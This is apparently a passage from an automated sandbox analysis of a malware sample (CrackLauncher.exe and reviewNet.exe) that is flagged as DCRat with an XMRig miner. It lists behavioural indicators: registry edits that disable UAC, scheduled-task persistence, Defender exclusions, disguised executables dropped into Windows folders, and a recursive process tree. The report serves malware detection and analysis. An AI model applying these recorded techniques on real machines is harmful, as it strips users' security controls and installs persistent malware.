\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\"" reviewNet.exe -
Process spawned unexpected child process 64 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description pid pid_target process target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4056 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3888 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3688 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3404 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3452 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4844 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3984 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4796 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4128 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4304 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3500 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3256 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4036 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4292 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5132 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3472 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5192 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5232 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5252 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5240 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5356 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5348 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5340 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5400 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5168 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5156 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5424 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5616 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5576 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5532 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5496 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5488 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5464 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5680 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5848 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5952 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5984 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6004 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5992 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5944 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5936 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5916 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5836 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5816 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5780 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6132 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5176 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5328 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3952 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3048 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2624 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3120 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 768 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4084 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3308 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3156 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2616 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3332 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2728 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5760 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5884 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3680 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6076 4912 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6084 4912 schtasks.exe
-
Processes:
description ioc process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe
-
Processes:
resource | yara_rule
\Users\Admin\AppData\Local\Temp\AtomicHunter.exe | dcrat
behavioral1/memory/2636-76-0x0000000000980000-0x0000000000C32000-memory.dmp | dcrat
C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\CrackLauncher.exe | dcrat
behavioral1/memory/5552-249-0x0000000000DC0000-0x0000000001072000-memory.dmp | dcrat
behavioral1/memory/948-262-0x0000000000E10000-0x00000000010C2000-memory.dmp | dcrat
behavioral1/memory/4648-265-0x00000000003C0000-0x0000000000672000-memory.dmp | dcrat
behavioral1/memory/4572-270-0x0000000000B40000-0x0000000000DF2000-memory.dmp | dcrat
-
XMRig Miner payload 1 IoCs
Processes:
resource | yara_rule
behavioral1/memory/560-435-0x0000000140000000-0x0000000140840000-memory.dmp | xmrig
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
Processes:
pid | process
5316 | powershell.exe
1472 | powershell.exe
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 64 IoCs
-
Adds Run key to start application 2 TTPs 64 IoCs
-
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | reviewNet.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | reviewNet.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | reviewNet.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reviewNet.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | reviewNet.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | reviewNet.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reviewNet.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reviewNet.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reviewNet.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reviewNet.exe
-
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
pid | process
4880 | powercfg.exe
1040 | cmd.exe
5424 | powercfg.exe
8124 | powercfg.exe
3052 | powercfg.exe
4928 | cmd.exe
5920 | powercfg.exe
1308 | powercfg.exe
4712 | powercfg.exe
1728 | powercfg.exe
-
Drops file in Program Files directory 28 IoCs
-
Drops file in Windows directory 11 IoCs
Processes:
description | ioc | process
File created | C:\Windows\AppPatch\cmd.exe | reviewNet.exe
File created | C:\Windows\Fonts\7a8b3f7b9ee9a7 | reviewNet.exe
File created | C:\Windows\DigitalLocker\es-ES\cmd.exe | reviewNet.exe
File created | C:\Windows\Boot\Fonts\CrackLauncher.exe | reviewNet.exe
File created | C:\Windows\Fonts\CrackLauncher.exe | reviewNet.exe
File created | C:\Windows\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\3.0.0.0__b03f5f7f11d50a3a\CrackLauncher.exe | reviewNet.exe
File created | C:\Windows\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\3.0.0.0__b03f5f7f11d50a3a\7a8b3f7b9ee9a7 | reviewNet.exe
File created | C:\Windows\SoftwareDistribution\DataStore\smss.exe | reviewNet.exe
File created | C:\Windows\SoftwareDistribution\DataStore\69ddcba757bf72 | reviewNet.exe
File created | C:\Windows\DigitalLocker\es-ES\ebf1f9fa8afd6d | reviewNet.exe
File created | C:\Windows\AppPatch\ebf1f9fa8afd6d | reviewNet.exe
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
5956 | sc.exe
4032 | sc.exe
2504 | sc.exe
1504 | sc.exe
7436 | sc.exe
3680 | sc.exe
3260 | sc.exe
3232 | sc.exe
2104 | sc.exe
6904 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 39 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 15 IoCs
Processes:
reviewNet.exe reviewNet.exe reviewNet.exe reviewNet.exe reviewNet.exe
description ioc process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reviewNet.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3012 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2904 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2860 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2272 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1920 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"13⤵
- Executes dropped EXE
- Loads dropped DLL
PID:324 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"14⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1504 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"15⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"16⤵
- Executes dropped EXE
- Loads dropped DLL
PID:316 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"17⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2284 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"18⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1372 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"19⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2416 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"20⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1464 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"21⤵
- Executes dropped EXE
- Loads dropped DLL
PID:552 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"22⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2792 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"23⤵
- Executes dropped EXE
PID:1924 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"24⤵
- Executes dropped EXE
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"25⤵
- Executes dropped EXE
PID:408 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"26⤵
- Executes dropped EXE
PID:3228 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"27⤵
- Executes dropped EXE
PID:3268 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"28⤵
- Executes dropped EXE
PID:3384 -
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"29⤵PID:3432
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"30⤵PID:3520
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"31⤵PID:3568
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"32⤵PID:3732
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"33⤵PID:3820
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"34⤵PID:3564
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"35⤵PID:3328
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"36⤵PID:4236
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"37⤵PID:4660
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"38⤵PID:2800
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"39⤵PID:5868
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"40⤵PID:3344
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"41⤵PID:4644
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"42⤵PID:6372
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"43⤵PID:6396
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"44⤵PID:6460
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"45⤵PID:6556
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"46⤵PID:6668
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"47⤵PID:6756
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"48⤵PID:6992
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"49⤵PID:7040
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"50⤵PID:7128
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"51⤵PID:4156
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"52⤵PID:1292
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"53⤵PID:2696
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"54⤵PID:536
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"55⤵PID:6868
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"56⤵PID:4736
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"57⤵PID:5008
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"58⤵PID:3020
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"59⤵PID:5604
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"60⤵PID:5804
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"61⤵PID:1568
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"62⤵PID:6892
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"63⤵PID:4772
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"64⤵PID:5900
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"65⤵PID:4608
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"66⤵PID:660
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"67⤵PID:6620
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"68⤵PID:5336
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"69⤵PID:2292
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"70⤵PID:5212
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"71⤵PID:5100
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"72⤵PID:5640
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"73⤵PID:6180
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"74⤵PID:4900
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"75⤵PID:3596
-
